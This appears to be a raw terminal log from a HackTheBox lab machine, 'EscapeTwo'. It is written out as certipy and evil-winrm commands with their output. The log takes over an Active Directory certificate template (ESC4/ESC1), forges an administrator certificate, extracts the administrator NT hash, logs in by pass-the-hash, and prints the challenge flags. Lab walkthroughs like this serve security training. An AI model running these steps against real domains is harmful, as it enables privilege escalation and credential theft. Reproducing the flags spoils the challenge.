└─$ certipy-ad template -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.148.204 -template DunderMifflinAuthentication -write-default-configurat
ion
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Saving current configuration to 'DunderMifflinAuthentication.json'
[*] Wrote current configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Replacing:
[*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x0
0\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*] flags: 66104
[*] pKIDefaultKeySpec: 2
[*] pKIKeyUsage: b'\x86\x00'
[*] pKIMaxIssuingDepth: -1
[*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*] pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*] msPKI-Enrollment-Flag: 0
[*] msPKI-Private-Key-Flag: 16
[*] msPKI-Certificate-Name-Flag: 1
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'DunderMifflinAuthentication'? (y/N): y
[*] Successfully updated 'DunderMifflinAuthentication'┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad find -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.148.204 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC01-CA'
[*] Checking web enrollment for CA 'sequel-DC01-CA' @ 'DC01.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250917192542_Certipy.txt'
[*] Wrote text output to '20250917192542_Certipy.txt'
[*] Saving JSON output to '20250917192542_Certipy.json'
[*] Wrote JSON output to '20250917192542_Certipy.json'┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ cat 20250917192542_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-09-17T16:23:27+00:00
Template Last Modified : 2025-09-17T16:25:01+00:00
Permissions
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Authenticated Users
Write Owner Principals : SEQUEL.HTB\Authenticated Users
Write Dacl Principals : SEQUEL.HTB\Authenticated Users
[+] User Enrollable Principals : SEQUEL.HTB\Authenticated Users
[+] User ACL Principals : SEQUEL.HTB\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC4 : User has dangerous permissions.┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad req -username ca_svc@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -target dc01.sequel.htb -dc-ip 10.129.148.204 -dc-host dc01.sequel.htb -ca sequel-D
C01-CA -template DunderMifflinAuthentication -upn administrator@sequel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.148.204
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ evil-winrm -i 10.129.148.204 -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.148.204
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
10e1d59ef74dfb769ae12c844199c464
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan\Desktop\user.txt
bde26ba827b32be73f1d19560047458eLast updated